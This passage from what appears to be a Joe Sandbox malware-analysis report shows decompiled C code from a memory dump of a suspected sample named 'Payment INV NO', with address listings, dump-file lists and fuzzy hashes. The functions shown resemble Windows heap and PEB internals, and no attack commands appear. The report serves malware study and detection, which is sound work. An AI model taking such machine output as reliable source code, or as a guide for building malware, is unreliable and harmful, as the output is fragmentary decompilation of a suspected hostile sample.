				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                          0x017ca61c
                                                          0x017ca61e
                                                          0x017ca623
                                                          0x017ca628
                                                          0x017ca62b
                                                          0x017ca62d
                                                          0x017ca648
                                                          0x017ca64a
                                                          0x017ca64f
                                                          0x01809b44
                                                          0x017ca6ec
                                                          0x017ca6f1
                                                          0x017ca6f1
                                                          0x017ca655
                                                          0x017ca657
                                                          0x017ca65a
                                                          0x017ca65d
                                                          0x017ca662
                                                          0x017ca663
                                                          0x017ca667
                                                          0x017ca668
                                                          0x017ca66d
                                                          0x017ca706
                                                          0x017ca706
                                                          0x01809bda
                                                          0x01809be6
                                                          0x01809beb
                                                          0x00000000
                                                          0x01809beb
                                                          0x017ca679
                                                          0x01809b7a
                                                          0x00000000
                                                          0x01809b7a
                                                          0x017ca683
                                                          0x017ca6f4
                                                          0x017ca6f7
                                                          0x017ca6f9
                                                          0x017ca6fd
                                                          0x017ca6a0
                                                          0x017ca6a0
                                                          0x017ca6ad
                                                          0x017ca6af
                                                          0x017ca6b4
                                                          0x01809ba7
                                                          0x01809bac
                                                          0x00000000
                                                          0x00000000
                                                          0x01809bc6
                                                          0x01809bce
                                                          0x01809bd1
                                                          0x01809bd3
                                                          0x01809bd3
                                                          0x00000000
                                                          0x01809bd1
                                                          0x017ca6bd
                                                          0x017ca6c3
                                                          0x017ca6c6
                                                          0x017ca6d2
                                                          0x017ca701
                                                          0x017ca704
                                                          0x00000000
                                                          0x017ca704
                                                          0x017ca6d4
                                                          0x017ca6d6
                                                          0x017ca6d9
                                                          0x017ca6db
                                                          0x017ca6e1
                                                          0x017ca6e6
                                                          0x017ca6e8
                                                          0x017ca6e8
                                                          0x017ca6ea
                                                          0x00000000
                                                          0x017ca6ea
                                                          0x017ca688
                                                          0x017ca692
                                                          0x017ca694
                                                          0x017ca699
                                                          0x00000000
                                                          0x00000000
                                                          0x017ca69d
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a2410e023b1e23f6aac5d2d0c67fc533dbf69ed9378c4bd312f7565ca306f9f
                                                          • Instruction ID: dd920fdf0ed287083b65bb11cc0382f3671f88a179252ebfb5b6398a8c4208ba
                                                          • Opcode Fuzzy Hash: 0a2410e023b1e23f6aac5d2d0c67fc533dbf69ed9378c4bd312f7565ca306f9f
                                                          • Instruction Fuzzy Hash: CA314575A00209DFCB15CF58C890B9DBBF2BB89714F24806EE909EB385E775AA01CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A8800 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E017A8800(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				intOrPtr _t62;
				signed int _t66;
				signed char _t67;
				void* _t69;
				signed int _t70;
				signed int _t78;
				signed int _t85;
				intOrPtr* _t88;
				signed int _t93;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t106;
				signed int* _t110;
				signed int _t114;
				signed int* _t118;
				intOrPtr _t119;
				signed int _t123;
				signed int _t125;

				_t119 = __ecx;
				_t62 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_t106 = 0;
				_v20 = __ecx;
				_t88 = 0;
				if(_t62 != 0) {
					_t88 = _t62 + 0x5d8;
					if(_t88 == 0 ||  *((intOrPtr*)(_t88 + 0x30)) == 0) {
						_t88 = 0;
					}
				}
				_v28 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(_t88 == 0 || _t119 == 0) {
					L13:
					return _t106;
				} else {
					if( *((intOrPtr*)(_t88 + 8)) == 0) {
						L12:
						_t106 = 1;
						goto L13;
					}
					_t11 = _t88 + 0x40; // 0x40
					_t117 = _t11;
					E017A8999(_t11,  &_v12);
					if(_a4 != 0) {
						__eflags = _a4 - 1;
						if(_a4 != 1) {
							goto L12;
						}
						_t92 =  *(_t119 + 0x64);
						__eflags =  *(_t119 + 0x64);
						if( *(_t119 + 0x64) == 0) {
							goto L12;
						}
						E017A8999(_t92,  &_v8);
						_t110 = _v8;
						_t66 = 0;
						__eflags = 0;
						_t93 =  *_t110;
						while(1) {
							__eflags =  *((intOrPtr*)(0x1885c60 + _t66 * 8)) - _t93;
							if( *((intOrPtr*)(0x1885c60 + _t66 * 8)) == _t93) {
								break;
							}
							_t66 = _t66 + 1;
							__eflags = _t66 - 5;
							if(_t66 < 5) {
								continue;
							}
							_t95 = 0;
							__eflags = 0;
							L27:
							__eflags = _t95;
							if(_t95 != 0) {
								goto L12;
							}
							__eflags = _v12 - _t110;
							if(_v12 != _t110) {
								goto L12;
							}
							E017B2280(_t67, 0x18886cc);
							_t69 = L01869DFB( &_v16);
							__eflags = _t69 - 1;
							if(_t69 != 1) {
							}
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *_t88 =  *_t88 + 1;
							asm("adc dword [ebx+0x4], 0x0");
							_t70 = L017C61A0( &_v28);
							__eflags = _t70;
							if(_t70 == 0) {
								L20:
								 *_t88 =  *_t88 + 1;
								asm("adc dword [ebx+0x4], 0x0");
								E017AFFB0(_t88, _t117, 0x18886cc);
								goto L12;
							}
							__eflags = _v28 | _v24;
							if((_v28 | _v24) == 0) {
								goto L20;
							}
							_t98 = _t88 + 0x40;
							L40:
							L01869D2E(_t98, 1, _v28, _v24,  *(_v20 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v20 + 0x28)));
							goto L20;
						}
						_t67 = 0x1885c64 + _t66 * 8;
						asm("lock xadd [eax], ecx");
						_t95 = (_t93 | 0xffffffff) - 1;
						goto L27;
					}
					_t106 = L017A8A0A( *((intOrPtr*)(_t119 + 0x18)),  &_v8);
					if(_t106 == 0) {
						goto L13;
					}
					_t118 = _v8;
					_t78 = 0;
					_t100 =  &(_t118[1]);
					 *(_t119 + 0x64) = _t100;
					_t114 =  *_t118;
					_v16 = _t100;
					while( *((intOrPtr*)(0x1885c60 + _t78 * 8)) != _t114) {
						_t78 = _t78 + 1;
						if(_t78 < 5) {
							continue;
						}
						L11:
						if(E017DF380(_t100, 0x1771184, 0x10) != 0) {
							__eflags =  *_t118 -  *_v12;
							if( *_t118 >=  *_v12) {
								goto L12;
							}
							asm("cdq");
							_t123 = _t118[5] & 0x0000ffff;
							_t83 = _t118[5] & 0x0000ffff;
							asm("cdq");
							_t125 = _t123 << 0x00000010 | _t118[5] & 0x0000ffff;
							__eflags = ((_t114 << 0x00000020 | _t123) << 0x10 | _t114) -  *((intOrPtr*)(_t88 + 0x2c));
							if(__eflags > 0) {
								L19:
								E017B2280(_t83, 0x18886cc);
								 *_t88 =  *_t88 + 1;
								_t117 = _t88 + 0x40;
								asm("adc dword [ebx+0x4], 0x0");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 = L017C61A0( &_v28);
								__eflags = _t85;
								if(_t85 != 0) {
									__eflags = _v28 | _v24;
									if((_v28 | _v24) == 0) {
										goto L20;
									}
									_t98 = _v16;
									goto L40;
								}
								goto L20;
							}
							if(__eflags < 0) {
								goto L12;
							}
							__eflags = _t125 -  *((intOrPtr*)(_t88 + 0x28));
							if(_t125 <  *((intOrPtr*)(_t88 + 0x28))) {
								goto L12;
							}
							goto L19;
						}
						goto L12;
					}
					asm("lock inc dword [eax]");
					goto L11;
				}
			}






























                                                          0x017a8810
                                                          0x017a8814
                                                          0x017a881a
                                                          0x017a881c
                                                          0x017a881f
                                                          0x017a8824
                                                          0x017a8826
                                                          0x017a882e
                                                          0x017f9c48
                                                          0x017f9c48
                                                          0x017a882e
                                                          0x017a883d
                                                          0x017a8840
                                                          0x017a8843
                                                          0x017a8846
                                                          0x017a8849
                                                          0x017a884e
                                                          0x017a88b7
                                                          0x017a88bf
                                                          0x017a8854
                                                          0x017a8857
                                                          0x017a88b4
                                                          0x017a88b6
                                                          0x00000000
                                                          0x017a88b6
                                                          0x017a8859
                                                          0x017a8859
                                                          0x017a8861
                                                          0x017a886a
                                                          0x017a893d
                                                          0x017a8941
                                                          0x00000000
                                                          0x00000000
                                                          0x017a8947
                                                          0x017a894a
                                                          0x017a894c
                                                          0x00000000
                                                          0x00000000
                                                          0x017a8955
                                                          0x017a895a
                                                          0x017a895d
                                                          0x017a895d
                                                          0x017a895f
                                                          0x017a8961
                                                          0x017a8961
                                                          0x017a8968
                                                          0x00000000
                                                          0x00000000
                                                          0x017a896a
                                                          0x017a896b
                                                          0x017a896e
                                                          0x00000000
                                                          0x00000000
                                                          0x017a8970
                                                          0x017a8970
                                                          0x017a8972
                                                          0x017a8972
                                                          0x017a8974
                                                          0x00000000
                                                          0x00000000
                                                          0x017a897a
                                                          0x017a897d
                                                          0x00000000
                                                          0x00000000
                                                          0x017f9c65
                                                          0x017f9c6d
                                                          0x017f9c72
                                                          0x017f9c75
                                                          0x017f9c75
                                                          0x017f9c82
                                                          0x017f9c86
                                                          0x017f9c87
                                                          0x017f9c88
                                                          0x017f9c89
                                                          0x017f9c8c
                                                          0x017f9c90
                                                          0x017f9c95
                                                          0x017f9c97
                                                          0x017a8927
                                                          0x017a8927
                                                          0x017a892f
                                                          0x017a8933
                                                          0x00000000
                                                          0x017a8933
                                                          0x017f9ca0
                                                          0x017f9ca3
                                                          0x00000000
                                                          0x00000000
                                                          0x017f9ca9
                                                          0x017f9cac
                                                          0x017f9cc0
                                                          0x00000000
                                                          0x017f9cc0
                                                          0x017a8988
                                                          0x017a8992
                                                          0x017a8996
                                                          0x00000000
                                                          0x017a8996
                                                          0x017a887b
                                                          0x017a887f
                                                          0x00000000
                                                          0x00000000
                                                          0x017a8881
                                                          0x017a8884
                                                          0x017a8886
                                                          0x017a8889
                                                          0x017a888c
                                                          0x017a888e
                                                          0x017a8891
                                                          0x017a889a
                                                          0x017a889e
                                                          0x00000000
                                                          0x00000000
                                                          0x017a88a0
                                                          0x017a88b2
                                                          0x017a88d3
                                                          0x017a88d5
                                                          0x00000000
                                                          0x00000000
                                                          0x017a88db
                                                          0x017a88dc
                                                          0x017a88e0
                                                          0x017a88e8
                                                          0x017a88ee
                                                          0x017a88f0
                                                          0x017a88f3
                                                          0x017a88fc
                                                          0x017a8901
                                                          0x017a8906
                                                          0x017a890c
                                                          0x017a890f
                                                          0x017a8916
                                                          0x017a8917
                                                          0x017a8918
                                                          0x017a8919
                                                          0x017a891a
                                                          0x017a891f
                                                          0x017a8921
                                                          0x017f9c52
                                                          0x017f9c55
                                                          0x00000000
                                                          0x00000000
                                                          0x017f9c5b
                                                          0x00000000
                                                          0x017f9c5b
                                                          0x00000000
                                                          0x017a8921
                                                          0x017a88f5
                                                          0x00000000
                                                          0x00000000
                                                          0x017a88f7
                                                          0x017a88fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a88fa
                                                          0x00000000
                                                          0x017a88b2
                                                          0x017a88c9
                                                          0x00000000
                                                          0x017a88c9

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bc1c4a0bc710b549d6caa7d1337e9e34db333171b2d0b089debf591cdf00eef
                                                          • Instruction ID: f1b8f42ea5f9105759d15005b7c171735edd5843678467f254e05dd8417ec40d
                                                          • Opcode Fuzzy Hash: 8bc1c4a0bc710b549d6caa7d1337e9e34db333171b2d0b089debf591cdf00eef
                                                          • Instruction Fuzzy Hash: 4E21D331A11205CBEF18DF5CD4846AEF7B9FFC4312F84826EE90597344DB709A40CA92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01794A20 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E01794A20(void* __ecx, signed char _a4, intOrPtr _a8) {
				void* __esi;
				void* __ebp;
				char* _t21;
				void* _t32;
				intOrPtr* _t34;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				signed char _t40;
				void* _t50;

				if(E017B7D50() != 0) {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t21 = 0x7ffe0386;
				}
				_t40 = _a4;
				if( *_t21 != 0) {
					L01869BBE(_t40,  *((intOrPtr*)(_t40 + 0x20)),  *((intOrPtr*)(_t40 + 0x24)),  *((intOrPtr*)(_t40 + 0x34)));
				}
				if(_a8 == 0 && ( *(_t40 + 0x1c) & 0x000000c0) != 0) {
					_push(2);
					_pop(0);
				}
				_t34 =  *((intOrPtr*)(_t40 + 0x14));
				_t36 =  *0x18886b8; // 0x0
				if(_t34 == 0) {
					_t34 = _t36;
					if(0 == 0) {
						_t34 =  *0x18886c0; // 0x12607b0
					}
				}
				_t50 = _t34 -  *0x18886c0; // 0x12607b0
				if(_t50 != 0) {
					__eflags = _t34 - _t36;
					if(__eflags != 0) {
						__eflags = 0xffffffff;
						asm("lock xadd [ecx], eax");
						if(0xffffffff == 0) {
							E01799240(_t32, _t34, _t38, _t40, 0xffffffff);
						}
						L11:
						if( *((intOrPtr*)(_t40 + 0x18)) != 0) {
							_push( *((intOrPtr*)(_t40 + 0x18)));
							E017D95D0();
						}
						if( *((intOrPtr*)(_t40 + 0x28)) != 0xffffffff) {
							E017C9B10( *((intOrPtr*)(_t40 + 0x28)));
						}
						if( *((intOrPtr*)(_t40 + 0x2c)) != 0) {
							E017A0840(_t34,  *((intOrPtr*)(_t40 + 0x2c)));
						}
						return E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t40);
					}
					_t37 = 0x18886bc;
					_t34 = 0x18886b8;
					L10:
					E017C9B82(_t32, _t34, _t37, _t38, _t40, _t50);
					goto L11;
				}
				_t37 = 0x18886c4;
				_t34 = 0x18886c0;
				goto L10;
			}













                                                          0x01794a31
                                                          0x017f0a89
                                                          0x01794a37
                                                          0x01794a37
                                                          0x01794a37
                                                          0x01794a3f
                                                          0x01794a42
                                                          0x017f0a9e
                                                          0x017f0a9e
                                                          0x01794a4d
                                                          0x01794abf
                                                          0x01794ac1
                                                          0x01794ac1
                                                          0x01794a55
                                                          0x01794a58
                                                          0x01794a60
                                                          0x01794a62
                                                          0x01794a66
                                                          0x01794a68
                                                          0x01794a68
                                                          0x01794a66
                                                          0x01794a6e
                                                          0x01794a74
                                                          0x017f0aa8
                                                          0x017f0aaa
                                                          0x017f0abb
                                                          0x017f0abe
                                                          0x017f0ac2
                                                          0x017f0ac8
                                                          0x017f0ac8
                                                          0x01794a89
                                                          0x01794a8d
                                                          0x017f0ad2
                                                          0x017f0ad5
                                                          0x017f0ad5
                                                          0x01794a97
                                                          0x017f0ae2
                                                          0x017f0ae2
                                                          0x01794aa1
                                                          0x017f0aef
                                                          0x017f0aef
                                                          0x01794abc
                                                          0x01794abc
                                                          0x017f0aac
                                                          0x017f0ab1
                                                          0x01794a84
                                                          0x01794a84
                                                          0x00000000
                                                          0x01794a84
                                                          0x01794a7a
                                                          0x01794a7f
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df74cda9938ae19032edc743a5e66022dffc6aac5f06ab2b54fc70be56f780d2
                                                          • Instruction ID: dbcd945f2986753b2f52c469c635fb4e19d6700a6f0a13c4aeb6998cfa9a33de
                                                          • Opcode Fuzzy Hash: df74cda9938ae19032edc743a5e66022dffc6aac5f06ab2b54fc70be56f780d2
                                                          • Instruction Fuzzy Hash: D721E731100A01DFCF32AA29EE04B2BF7A6FB51324F10075DE557467E6E634AB4ACB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C3B7A Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E017C3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				signed char _t35;
				signed char _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18884c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E017DAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E017DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18884c4; // 0x0
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                          0x017c3b89
                                                          0x017c3b96
                                                          0x017c3ba1
                                                          0x017c3bab
                                                          0x017c3bb5
                                                          0x017c3bb9
                                                          0x01806298
                                                          0x017c3bbf
                                                          0x017c3bc2
                                                          0x017c3bc3
                                                          0x017c3bc9
                                                          0x017c3bca
                                                          0x017c3bcc
                                                          0x017c3bcd
                                                          0x017c3bd4
                                                          0x017c3bd6
                                                          0x017c3bdb
                                                          0x017c3bea
                                                          0x017c3bf7
                                                          0x017c3bfb
                                                          0x017c3bff
                                                          0x017c3c09
                                                          0x017c3c0a
                                                          0x017c3c0b
                                                          0x017c3c0f
                                                          0x017c3c14
                                                          0x017c3c18
                                                          0x017c3c18
                                                          0x017c3bfb
                                                          0x017c3c1b
                                                          0x017c3c30
                                                          0x017c3c30
                                                          0x017c3c3d

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
